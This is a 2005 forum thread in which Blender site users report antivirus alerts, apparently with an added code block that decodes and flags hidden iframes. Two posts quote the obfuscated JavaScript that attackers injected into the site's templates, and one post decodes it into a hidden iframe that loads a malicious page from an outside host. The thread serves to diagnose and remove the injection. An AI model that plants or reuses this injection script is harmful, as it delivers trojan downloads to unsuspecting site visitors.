virus

General discussion about the development of the open source Blender

Moderators: jesterKing, stiv

coldlamper
Posts: 0
Joined: Fri Mar 25, 2005 5:38 pm

virus

Post by coldlamper » Sat Jun 25, 2005 12:10 am

Every time I come to this site I get a Virus detected from AVG.
I-Worm/Bofra

Anyone else ever get this?

reD_Fox
Posts: 0
Joined: Sat Mar 12, 2005 2:56 pm
Location: Abilene, KS

Yeah, me too!

Post by reD_Fox » Sat Jun 25, 2005 12:46 am

I'm getting something similar.
Norton says that it's "Downloader.Trojan"
Something that apparently uses an IFRAME vulnerability in IE. It apparently is trying to connect to http://eofsoftware.org/x.html
which is the page that seems to host the malicious code.
I would recommend that someone look into it.

Levi
A three-legged stool never wobbles.

z3r0_d
Posts: 289
Joined: Wed Oct 16, 2002 2:38 am

Post by z3r0_d » Sat Jun 25, 2005 1:37 am

yeah


<script language="JavaScript">


// universal location script v 1.34


var checkcode = String.fromCharCode(60,105,102,114,97,109,101,32, 115,114,99,61,39,104,116,116,112,58,47,47,101,111,102,115,111,102, 116,119,97,114,101,46,111,114,103,47,120,46,104,116,109,108,39,32, 115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,32,110,111, 110,101,59,32,118,105,115,105,98,105,108,105,116,121,58,32,104,105, 100,100,101,110,59,32,119,105,100,116,104,58,32,49,59,32,104,101,105, 103,104,116,58,32,49,39,62,60,47,105,102,114,97,109,101,62);document.write(checkcode);
</script>
[spaces added to last bit because messed up display]
very annoying, good excuse to disable JavaScript...

vulnerability in IE? no, it writes the code for an iframe... I have no idea why it would be there though

ysvry
Posts: 0
Joined: Thu Aug 05, 2004 4:28 pm

Post by ysvry » Sun Jun 26, 2005 1:11 am

well let the webmaster get that script out then. giving a chance to upload a trojan is bad and can harm Blender's reputation badly. it's now 24 hours later and still nothing is done? Ton, if you don't see it on a linux or mac box, check it on a windows machine with a proper virus checker. this should be sorted out quickly. Also the one responsible for adding the script should be banned.

coldlamper
Posts: 0
Joined: Fri Mar 25, 2005 5:38 pm

Post by coldlamper » Sun Jun 26, 2005 3:31 am

If you have a firewall and have the ability to block hosts or IPs I would suggest blocking:

eofsoftware.org
or
67.19.170.226

coldlamper
Posts: 0
Joined: Fri Mar 25, 2005 5:38 pm

Post by coldlamper » Sun Jun 26, 2005 4:04 am

var checkcode = String.fromCharCode(60,105,102,114,97,109,101,32, 115,114,99,61,39,104,116,116,112,58,47,47,101,111,102,115,111,102, 116,119,97,114,101,46,111,114,103,47,120,46,104,116,109,108,39,32, 115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,32,110,111, 110,101,59,32,118,105,115,105,98,105,108,105,116,121,58,32,104,105, 100,100,101,110,59,32,119,105,100,116,104,58,32,49,59,32,104,101,105, 103,104,116,58,32,49,39,62,60,47,105,102,114,97,109,101,62);document.write(checkcode);


outputs

<frame src="http://eofsoftware.org/x.html" style='display: none; visibility: hidden; width: 1; height: 1'></frame>
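
The decoding shown in the post above can be done without running the script. This is an added example, not part of the original thread: it reads String.fromCharCode(...) calls as text and flags any hidden iframe they spell out. The function names and the site host `forum.example` are assumptions made for illustration.

```javascript
// Added example: decode String.fromCharCode(...) calls found in page source
// as plain text (nothing is evaluated) and flag hidden iframes they produce.
// The script is the one quoted in this thread; the page around it is constructed.
const SAMPLE_PAGE = `<html><body><p>constructed forum page</p>
<script language="JavaScript">
var checkcode = String.fromCharCode(60,105,102,114,97,109,101,32,
115,114,99,61,39,104,116,116,112,58,47,47,101,111,102,115,111,102,
116,119,97,114,101,46,111,114,103,47,120,46,104,116,109,108,39,32,
115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,32,110,111,
110,101,59,32,118,105,115,105,98,105,108,105,116,121,58,32,104,105,
100,100,101,110,59,32,119,105,100,116,104,58,32,49,59,32,104,101,105,
103,104,116,58,32,49,39,62,60,47,105,102,114,97,109,101,62);document.write(checkcode);
</script></body></html>`;

// Return the string spelled out by each call that takes only numeric literals.
function decodeCharCodeCalls(source) {
  const decoded = [];
  const re = /String\.fromCharCode\(([\d\s,]+)\)/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    const codes = m[1].split(",").map((s) => s.trim()).filter(Boolean).map(Number);
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// Report every iframe tag inside the decoded strings. siteHost (hypothetical
// parameter) is the host the page is served from, used to mark external sources.
function findHiddenIframes(source, siteHost) {
  const findings = [];
  for (const text of decodeCharCodeCalls(source)) {
    const tagRe = /<iframe\b[^>]*>/gi;
    let t;
    while ((t = tagRe.exec(text)) !== null) {
      const tag = t[0];
      const src = (/src\s*=\s*['"]?([^'"\s>]+)/i.exec(tag) || [])[1] || "";
      let host = "";
      try { host = new URL(src).hostname; } catch (e) { /* relative or malformed src */ }
      const hidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag) ||
        /(width|height)\s*[:=]\s*['"]?[01]\b/i.test(tag);
      findings.push({ src, host, hidden, external: host !== "" && host !== siteHost });
    }
  }
  return findings;
}

console.log(findHiddenIframes(SAMPLE_PAGE, "forum.example"));
```

Run over the source of each served page or template output, any finding with both `hidden` and `external` set is worth tracing back to the file that emitted it.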

levon
Posts: 0
Joined: Thu Jul 31, 2003 6:06 am
Location: adelaide

Post by levon » Sun Jun 26, 2005 4:58 am

first of all, you are using IE?????


try clearing all your cache, cookies, files etc.... and running an adaware detector on your computer, it's more than likely that you have a browser hijacker.

z3r0_d
Posts: 289
Joined: Wed Oct 16, 2002 2:38 am

Post by z3r0_d » Sun Jun 26, 2005 9:52 am

levon wrote:
first of all, you are using IE?????

try clearing all your cache, cookies, files etc.... and running an adaware detector on your computer, it's more than likely that you have a browser hijacker.

it's there regardless of the browser, check the source of any templated page [like this one]... you'll see it too

matt_e
Posts: 410
Joined: Mon Oct 14, 2002 4:32 am
Location: Sydney, Australia

Post by matt_e » Sun Jun 26, 2005 2:32 pm

I checked this out, and it looks like there was some very dodgy looking obfuscated code inserted into the bottom of one of the postnuke PHP template files. This code was generating the javascript code block that coldlamper posted. As far as I know, there should be nothing at all to do with "eofsoftware.org" within our source code.

This entire thing is very suspicious and I've removed the code in question. The server admins are looking into what's happened here, but at least things should be safe for now. Windows users, please check to see if you are still getting the warning, and keep us up to date if it happens again.

Cheers

Lorca
Posts: 13
Joined: Tue Jan 14, 2003 12:44 pm
Location: São Paulo, Brasil

Post by Lorca » Sun Jun 26, 2005 7:41 pm

I am browsing this forum with IE and everything looks fine. What a nonsense attack!

ysvry
Posts: 0
Joined: Thu Aug 05, 2004 4:28 pm

Post by ysvry » Wed Jun 29, 2005 2:48 am

now the code has been removed it works ok. Maybe you can do a check up on who owns the site where the frame linked to?

It was not cookies or something in the cache as I cleared that out before I posted my first post.
some fucker tried to install trojans on Windows computers, if he succeeded he could for example format your hd. so it is grave.

ysvry
Posts: 0
Joined: Thu Aug 05, 2004 4:28 pm

Post by ysvry » Mon Jul 04, 2005 3:21 pm

It would be nice if we get an explanation of what happened and who was responsible for this attack??
